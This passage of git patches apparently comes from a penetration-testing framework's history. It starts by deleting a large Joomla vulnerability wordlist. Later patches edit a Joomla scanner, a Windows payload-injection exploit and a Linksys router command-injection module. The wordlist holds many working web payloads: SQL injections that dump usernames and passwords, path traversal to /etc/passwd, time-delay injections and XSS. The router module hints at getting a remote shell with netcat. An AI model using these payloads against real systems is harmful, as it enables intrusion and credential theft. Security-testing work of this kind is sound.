/dev/null @@ -1,627 +0,0 @@ -&controller=../../../../../../../../../../../../[LFI]%00 -?1.5.10-x -?1.5.11-x-http_ref -?1.5.11-x-php-s3lf -?1.5.3-path-disclose -?1.5.3-spam -?1.5.8-x -?1.5.9-x -?j1012-fixate-session -?option=com_mysms&Itemid=0&task=phonebook -Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png -admin/ -administrator/ -administrator/components/ -administrator/components/com_a6mambocredits/ -administrator/components/com_a6mambohelpdesk/ -administrator/components/com_admin/admin.admin.html.php -administrator/components/com_astatspro/refer.php -administrator/components/com_bayesiannaivefilter/ -administrator/components/com_chronocontact/excelwriter/PPS/File.php -administrator/components/com_colophon/ -administrator/components/com_colorlab/ -administrator/components/com_comprofiler/ -administrator/components/com_comprofiler/plugin.class.php -administrator/components/com_cropimage/admin.cropcanvas.php -administrator/components/com_extplorer/ -administrator/components/com_feederator/includes/tmsp/add_tmsp.php -administrator/components/com_googlebase/ -administrator/components/com_installer -administrator/components/com_jcs/ -administrator/components/com_jim/ -administrator/components/com_jjgallery/ -administrator/components/com_joom12pic/ -administrator/components/com_joomla-visites/ -administrator/components/com_joomla_flash_uploader/ -administrator/components/com_joomlaflashfun/ -administrator/components/com_joomlaradiov5/ -administrator/components/com_jpack/ -administrator/components/com_jreactions/ -administrator/components/com_juser/ -administrator/components/com_admin/ -administrator/components/com_kochsuite / -administrator/components/com_linkdirectory/ -administrator/components/com_livechat/getSavedChatRooms.php -administrator/components/com_livechat/xmlhttp.php -administrator/components/com_lurm_constructor/admin.lurm_constructor.php -administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); -administrator/components/com_mambelfish/ -administrator/components/com_mgm/ -administrator/components/com_mmp/help.mmp.php -administrator/components/com_mosmedia/ -administrator/components/com_multibanners/extadminmenus.class.php -administrator/components/com_panoramic/ -administrator/components/com_peoplebook/param.peoplebook.php -administrator/components/com_phpshop/toolbar.phpshop.html.php -administrator/components/com_remository/admin.remository.php -administrator/components/com_serverstat/install.serverstat.php -administrator/components/com_simpleswfupload/uploadhandler.php"); -administrator/components/com_swmenupro/ -administrator/components/com_treeg/ -administrator/components/com_uhp/ -administrator/components/com_uhp2/ -administrator/components/com_webring/ -administrator/components/com_wmtgallery/ -administrator/components/com_wmtportfolio/ -administrator/components/com_x-shop/ -administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ -administrator/index.php?option=com_searchlog&act=log -ajaxim/ -akocomments.php -cart?Itemid=[SQLi] -component/com__brightweblinks/ -component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 -component/osproperty/?task=agent_register -component/quran/index.php?option=com_quran&action=viewayat&surano= -components/com_ clickheat/ -components/com_5starhotels/ -components/com_Jambook/jambook.php -components/com_a6mambocredits/ -components/com_a6mambohelpdesk/ -components/com_ab_gallery/ -components/com_acajoom/ -components/com_acctexp/ -components/com_aclassf/ -components/com_activities/ -components/com_actualite/ -components/com_admin/admin.admin.html.php -components/com_advancedpoll/ -components/com_agora/ -components/com_agoragroup/ -components/com_ajaxchat/ -components/com_akobook/ -components/com_akocomment/ -components/com_akogallery -components/com_alberghi/ -components/com_allhotels/ -components/com_alphacontent/ -components/com_altas/ -components/com_amocourse/ -components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php -components/com_articles/ -components/com_artist/ -components/com_artlinks/ -components/com_asortyment/ -components/com_astatspro/ -components/com_awesom/ -components/com_babackup/ -components/com_banners/ -components/com_bayesiannaivefilter/ -components/com_be_it_easypartner/ -components/com_beamospetition/ -components/com_biblestudy/ -components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_blog/ -components/com_bookflip/ -components/com_bookjoomlas/ -components/com_booklibrary/ -components/com_books/ -components/com_bsadv/ -components/com_bsq_sitestats/ -components/com_bsq_sitestats/external/rssfeed.php -components/com_bsqsitestats/ -components/com_calendar/ -components/com_camelcitydb2/ -components/com_candle/ -components/com_casino_blackjack/ -components/com_casino_videopoker/ -components/com_casinobase/ -components/com_catalogproduction/ -components/com_catalogshop/ -components/com_category/ -components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> -components/com_chronocontact/excelwriter/PPS/File.php -components/com_cinema/ -components/com_clasifier/ -components/com_classifieds/ -components/com_clickheat/ -components/com_cloner/ -components/com_cmimarketplace/ -components/com_cms/ -components/com_colophon/ -components/com_colorlab/ -components/com_competitions/ -components/com_comprofiler/ -components/com_comprofiler/plugin.class.php -components/com_contactinfo/ -components/com_content/ -components/com_cpg/cpg.php -components/com_cropimage/admin.cropcanvas.php -components/com_custompages/ -components/com_cx/ -components/com_d3000/ -components/com_dadamail/ -components/com_dailymessage/ -components/com_datsogallery/ -components/com_dbquery/ -components/com_detail/ -components/com_digistore/ -components/com_directory/ -components/com_djiceshoutbox/ -components/com_doc/ -components/com_downloads/ -components/com_ds-syndicate/ -components/com_dtregister/ -components/com_dv/externals/phpupload/upload.php"); -components/com_easybook/ -components/com_emcomposer/ -components/com_equotes/ -components/com_estateagent/ -components/com_eventing/ -components/com_eventlist/ -components/com_events/ -components/com_ewriting/ -components/com_expose/uploadimg.php -components/com_expshop/ -components/com_extcalendar/ -components/com_extcalendar/cal_popup.php?extmode=view&extid= -components/com_extcalendar/extcalendar.php -components/com_extended_registration/registration_detailed.inc.php -components/com_extplorer/ -components/com_ezine/ -components/com_ezstore/ -components/com_facileforms/ -components/com_fantasytournament/ -components/com_faq/ -components/com_feederator/includes/tmsp/add_tmsp.php -components/com_filebase/ -components/com_filiale/ -components/com_flashfun/ -components/com_flashmagazinedeluxe/ -components/com_flippingbook/ -components/com_flyspray/startdown.php -components/com_fm/fm.install.php -components/com_foevpartners/ -components/com_football/ -components/com_formtool/ -components/com_forum/ -components/com_fq/ -components/com_fundraiser/ -components/com_galeria/ -components/com_galleria/galleria.html.php -components/com_gallery/ -components/com_game/ -components/com_gameq/ -components/com_garyscookbook/ -components/com_genealogy/ -components/com_geoboerse/ -components/com_gigcal/ -components/com_gmaps/ -components/com_googlebase/ -components/com_gsticketsystem/ -components/com_guide/ -components/com_hashcash/server.php -components/com_hbssearch/ -components/com_hello_world/ -components/com_hotproperties/ -components/com_hotproperty/ -components/com_hotspots/ -components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php -components/com_hwdvideoshare/ -components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); -components/com_ice/ -components/com_idoblog/ -components/com_idvnews/ -components/com_ignitegallery/ -components/com_ijoomla_archive/ -components/com_ijoomla_rss/ -components/com_inter/ -components/com_ionfiles/ -components/com_is/ -components/com_ixxocart/ -components/com_jabode/ -components/com_jashowcase/ -components/com_jb2/ -components/com_jce/ -components/com_jcs/ -components/com_jd-wiki/ -components/com_jd-wp/ -components/com_jim/ -components/com_jjgallery/ -components/com_jmovies/ -components/com_jobline/ -components/com_jombib/ -components/com_joobb/ -components/com_jooget/ -components/com_joom12pic/ -components/com_joomla-visites/ -components/com_joomla_flash_uploader/ -components/com_joomlaboard/ -components/com_joomladate/ -components/com_joomlaflashfun/ -components/com_joomlalib/ -components/com_joomlaradiov5/ -components/com_joomlavvz/ -components/com_joomlaxplorer/ -components/com_joomloads/ -components/com_joomradio/ -components/com_joomtracker/ -components/com_joovideo/ -components/com_jotloader/ -components/com_journal/ -components/com_jpack/ -components/com_jpad/ -components/com_jreactions/ -components/com_jreviews/scripts/xajax.inc.php -components/com_jumi/ -components/com_juser/ -components/com_jvideo/ -components/com_k2/ -components/com_kbase/ -components/com_knowledgebase/fckeditor/fckeditor.js -components/com_kochsuite / -components/com_kunena/ -components/com_letterman/ -components/com_lexikon/ -components/com_linkdirectory/ -components/com_listoffreeads/ -components/com_livechat/getSavedChatRooms.php -components/com_livechat/xmlhttp.php -components/com_liveticker/ -components/com_lm/ -components/com_lmo/ -components/com_loudmounth/includes/abbc/abbc.class.php -components/com_loudmouth/ -components/com_lowcosthotels/ -components/com_lurm_constructor/admin.lurm_constructor.php -components/com_mad4joomla/ -components/com_madeira/img.php -components/com_maianmusic/ -components/com_mailarchive/ -components/com_mailto/ -components/com_mambatstaff/mambatstaff.php -components/com_mambelfish/ -components/com_mambospgm/ -components/com_mambowiki/MamboLogin.php -components/com_marketplace/ -components/com_mcquiz/ -components/com_mdigg/ -components/com_media_library/ -components/com_mediaslide/ -components/com_mezun/ -components/com_mgm/ -components/com_minibb/ -components/com_misterestate/ -components/com_mmp/help.mmp.php -components/com_model/ -components/com_moodle/moodle.php -components/com_moofaq/ -components/com_mosmedia/ -components/com_mospray/scripts/admin.php -components/com_mosres/ -components/com_most/ -components/com_mp3_allopass/ -components/com_mtree/ -components/com_mtree/img/listings/o/{id}.php -components/com_multibanners/extadminmenus.class.php -components/com_myalbum/ -components/com_mycontent/ -components/com_mydyngallery/ -components/com_mygallery/ -components/com_n-forms/ -components/com_na_content/ -components/com_na_mydocs/ -components/com_na_newsdescription/ -components/com_na_qforms/ -components/com_neogallery/ -components/com_neorecruit/ -components/com_neoreferences/ -components/com_netinvoice/ -components/com_news/ -components/com_news_portal/ -components/com_newsflash/ -components/com_nfn_addressbook/ -components/com_nicetalk/ -components/com_noticias/ -components/com_omnirealestate/ -components/com_omphotogallery/ -components/com_ongumatimesheet20/ -components/com_onlineflashquiz/ -components/com_ownbiblio/ -components/com_panoramic/ -components/com_paxgallery/ -components/com_paxxgallery/ -components/com_pcchess/ -components/com_pcchess/include.pcchess.php -components/com_pccookbook/ -components/com_pccookbook/pccookbook.php -components/com_peoplebook/param.peoplebook.php -components/com_performs/ -components/com_philaform/ -components/com_phocadocumentation/ -components/com_php/ -components/com_phpshop/toolbar.phpshop.html.php -components/com_pinboard/ -components/com_pms/ -components/com_poll/ -components/com_pollxt/ -components/com_ponygallery/ -components/com_portafolio/ -components/com_portfol/ -components/com_prayercenter/ -components/com_pro_desk/ -components/com_prod/ -components/com_productshowcase/ -components/com_profiler/ -components/com_projectfork/ -components/com_propertylab/ -components/com_puarcade/ -components/com_publication/ -components/com_quiz/ -components/com_rapidrecipe/ -components/com_rdautos/ -components/com_realestatemanager/ -components/com_recly/ -components/com_referenzen/ -components/com_rekry/ -components/com_remository/admin.remository.php -components/com_remository_files/file_image_14/1276100016shell.php -components/com_reporter/processor/reporter.sql.php -components/com_resman/ -components/com_restaurante/ -components/com_ricette/ -components/com_rsfiles/ -components/com_rsgallery/ -components/com_rsgallery2/ -components/com_rss/ -components/com_rssreader/ -components/com_rssxt/ -components/com_rwcards/ -components/com_school/ -components/com_search/ -components/com_sebercart/getPic.php?p=[LFD]%00 -components/com_securityimages/ -components/com_sef/ -components/com_seminar/ -components/com_serverstat/install.serverstat.php -components/com_sg/ -components/com_simple_review/ -components/com_simpleboard/ -components/com_simplefaq/ -components/com_simpleshop/ -components/com_sitemap/sitemap.xml.php -components/com_slideshow/ -components/com_smf/ -components/com_smf/smf.php -components/com_swmenupro/ -components/com_team/ -components/com_tech_article/ -components/com_thopper/ -components/com_thyme/ -components/com_tickets/ -components/com_tophotelmodule/ -components/com_tour_toto/ -components/com_trade/ -components/com_uhp/ -components/com_uhp2/ -components/com_user/controller.php -components/com_users/ -components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php -components/com_vehiclemanager/ -components/com_versioning / -components/com_videodb/core/videodb.class.xml.php -components/com_virtuemart/ -components/com_volunteer/ -components/com_vr/ -components/com_waticketsystem/ -components/com_webhosting/ -components/com_weblinks/ -components/com_webring/ -components/com_wmtgallery/ -components/com_wmtportfolio/ -components/com_x-shop/ -components/com_xevidmegahd/ -components/com_xewebtv/ -components/com_xfaq/ -components/com_xgallery/helpers/img.php?file= -components/com_xsstream-dm/ -components/com_ynews/ -components/com_yvcomment/ -components/com_zoom/classes/ -components/mod_letterman/ -components/remository/ -eXtplorer/ -easyblog/entry/uncategorized -extplorer/ -http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} -includes/joomla.php -index.php/404' -index.php/?option=com_question&catID=21' and+1=0 union all -index.php/image-gallery/"><script>alert('xss')</script>/25-koala -index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 -index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view -index.php?option=com_aardvertiser&cat_name=conf&task=<= -index.php?option=com_aardvertiser&task= -index.php?option=com_abc&view=abc&letter=AS§ionid=' -index.php?option=com_advert&id=36' -index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- -index.php?option=com_alfurqan15x&action=viewayat&surano= -index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version -index.php?option=com_annonces&view=edit&Itemid=1 -index.php?option=com_articleman&task=new -index.php?option=com_bbs&bid=-1 -index.php?option=com_beamospetition&startpage=3&pet=- -index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- -index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 -index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 -index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- -index.php?option=com_chronoconnectivity&itemid=1 -index.php?option=com_chronocontact&itemid=1 -index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= -index.php?option=com_clantools&squad=1+ -index.php?option=com_clantools&task=clanwar&showgame=1+ -index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' -index.php?option=com_commedia&task=page&commpid=21 -index.php?option=com_connect&view=connect&controller= -index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ -index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_dioneformwizard&controller=[LFI]%00 -index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 -index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 -index.php?option=com_easyfaq&Itemid=1&task=view&gid= -index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ -index.php?option=com_easyfaq&task=view&contact_id= -index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= -index.php?option=com_equipment&task=components&id=45&sec_men_id= -index.php?option=com_equipment&view=details&id= -index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] -index.php?option=com_etree&view=displays&layout=category&id=[SQL] -index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] -index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 -index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- -index.php?option=com_filecabinet&task=download&cid[]=7 -index.php?option=com_firmy&task=section_show_set&Id=-1 -index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R -index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= -index.php?option=com_graphics&controller= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= -index.php?option=com_huruhelpdesk&view=detail -index.php?option=com_huruhelpdesk&view=detail&cid[0]= -index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 -index.php?option=com_iproperty&view=agentproperties&id= -index.php?option=com_jacomment&view= -index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 -index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_jcommunity&controller=members&task=1' -index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 -index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 -index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 -index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 -index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_jfuploader&Itemid= -index.php?option=com_jgen&task=view&id= -index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 -index.php?option=com_jimtawl&Itemid=12&task= -index.php?option=com_jmarket&controller=product&task=1' -index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' -index.php?option=com_jomdirectory&task=search&type=111+ -index.php?option=com_joomdle&view=detail&cat_id=1&course_id= -index.php?option=com_joomla_flash_uploader&Itemid=1 -index.php?option=com_joomleague&func=showNextMatch&p=[sqli] -index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] -index.php?option=com_joomtouch&controller= -index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 -index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 -index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users -index.php?option=com_jstore&controller=product-display&task=1' -index.php?option=com_jsubscription&controller=subscription&task=1' -index.php?option=com_jtickets&controller=ticket&task=1' -index.php?option=com_konsultasi&act=detail&sid= -index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en -index.php?option=com_kunena&func=userlist&search= -index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' -index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- -index.php?option=com_matamko&controller= -index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm -index.php?option=com_neorecruit&task=offer_view&id= -index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- -index.php?option=com_noticeboard&controller= -index.php?option=com_obsuggest&controller= -index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- -index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- -index.php?option=com_oziogallery&Itemid= -index.php?option=com_page&id=53 -index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] -index.php?option=com_phocagallery&view=categories&Itemid= -index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_php&file=../../../../../../../../../../etc/passwd -index.php?option=com_php&file=../images/phplogo.jpg -index.php?option=com_php&file=../js/ie_pngfix.js -index.php?option=com_ponygallery&Itemid=[sqli] -index.php?option=com_products&catid=-1 -index.php?option=com_products&id=-1 -index.php?option=com_products&product_id=-1 -index.php?option=com_products&task=category&catid=-1 -index.php?option=com_properties&task=agentlisting&aid= -index.php?option=com_qcontacts&Itemid=1' -index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts -index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_restaurantguide&view=country&id='&Itemid=69 -index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' -index.php?option=com_seyret&view= -index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- -index.php?option=com_smartsite&controller= -index.php?option=com_spa&view=spa_product&cid= -index.php?option=com_spidercalendar -index.php?option=com_spidercalendar&date=1' -index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_staticxt&staticfile=test.php&id=1923 -index.php?option=com_szallasok&mode=8&id=25 (SQL) -index.php?option=com_tag&task=tag&tag= -index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- -index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users -index.php?option=com_ultimateportfolio&controller= -index.php?option=com_users&view=registration -index.php?option=com_virtuemart&page=account.index&keyword=[sqli] -index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_x-shop&action=artdetail&idd=' -index.php?option=com_x-shop&action=artdetail&idd='[SQLi] -index.php?option=com_xcomp&controller=../../[LFI]%00 -index.php?option=com_xvs&controller=../../[LFI]%00 -index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- -index.php?option=com_yjcontactus&view= -index.php?option=com_youtube&id_cate=4 -index.php?option=com_zina&view=zina&Itemid=9 -index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= -index.php?search=NoGe&option=com_esearch&searchId= -index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube -index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- -js/index.php?option=com_socialads&view=showad&Itemid=94 -libraries/joomla/utilities/compat/php50x.php -libraries/pcl/pcltar.php -libraries/phpmailer/phpmailer.php -libraries/phpxmlrpc/xmlrpcs.php -modules/mod_artuploader/upload.php"); -modules/mod_as_category.php -modules/mod_calendar.php -modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] -modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); -modules/mod_jfancy/script.php"); -modules/mod_ppc_simple_spotlight/elements/upload_file.php -modules/mod_ppc_simple_spotlight/img/ -modules/mod_pxt/ -modules/mod_quick_question.php -modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 -patch/makedown.php?arquivo=../../../../etc/passwd -plugins/content/efup_files/helper.php"); -plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> -plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ -plugins/editors/xstandard/attachmentlibrary.php -print.php?task=person&id=36 and 1=1 -templates/be2004-2/ -templates/ja_purity/ -wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- -web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 7b497d1846b9..798496cb7448 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -101,7 +101,7 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - + apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort From 6cdb1a80de61b46853401ef971d7bd470c52ad81 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 09:47:20 -0500 Subject: [PATCH 146/421] Remove app from fingerprint and blank line --- modules/auxiliary/scanner/http/joomla_vulnscan.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 798496cb7448..1c465719f1a3 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -52,7 +52,7 @@ def osfingerprint(response) return os end - def fingerprint(response, app) + def fingerprint(response) if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -101,7 +101,6 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort @@ -137,7 +136,7 @@ def check_app(tpath, app, ip) res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) - out = fingerprint(res,app) + out = fingerprint(res) return if not out if(out =~ /Unknown Joomla/) print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") From 2cedcad810a168f08a12bce2c73717d3547c47f0 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 24 Jan 2013 10:46:23 -0600 Subject: [PATCH 147/421] Check PID --- .../exploits/windows/local/payload_inject.rb | 25 ++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index cc4efe818254..38eab33c686d 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -65,7 +65,7 @@ def exploit # Figures out which PID to inject to def get_pid pid = datastore['PID'] - if pid == 0 or datastore['NEWPROCESS'] + if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) print_status("Launching notepad.exe...") pid = create_temp_proc end @@ -73,6 +73,29 @@ def get_pid return pid end + + # Determines if a PID actually exists + def has_pid?(pid) + procs = [] + begin + procs = client.sys.process.processes + rescue Rex::Post::Meterpreter::RequestError + print_error("Unable to enumerate processes") + return false + end + + pids = [] + + procs.each do |p| + found_pid = p['pid'] + return true if found_pid == pid + end + + print_error("PID #{pid.to_s} does not actually exist.") + + return false + end + # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) From 1fc747994e663c7d0dae0e9cec2a74143cb0214f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 17:50:14 +0100 Subject: [PATCH 148/421] cleanup for linksys_wrt54gl_exec --- .../admin/http/linksys_wrt54gl_exec.rb | 225 +++++++++--------- 1 file changed, 118 insertions(+), 107 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 8f270248e433..ea37ca8e21a8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -17,14 +17,14 @@ def initialize(info = {}) 'Description' => %q{ Some Linksys Routers are vulnerable to OS Command injection. You will need credentials to the web interface to access the vulnerable part - of the application. - Default credentials are always a good starting point. admin/admin or admin + of the application. + Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. - Note: This is a blind os command injection vulnerability. This means that - you will not see any output of your command. Try a ping command to your + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your local system for a first test. - - Hint: To get a remote shell you could upload a netcat binary and exec it. + + Hint: To get a remote shell you could upload a netcat binary and exec it. WARNING: Backup your network and dhcp configuration. We will overwrite it! Have phun }, @@ -37,7 +37,7 @@ def initialize(info = {}) [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], [ 'EDB', '24202' ], [ 'BID', '57459' ], - [ 'OSVDB', '89421' ], + [ 'OSVDB', '89421' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) @@ -47,13 +47,13 @@ def initialize(info = {}) Opt::RPORT(80), OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + 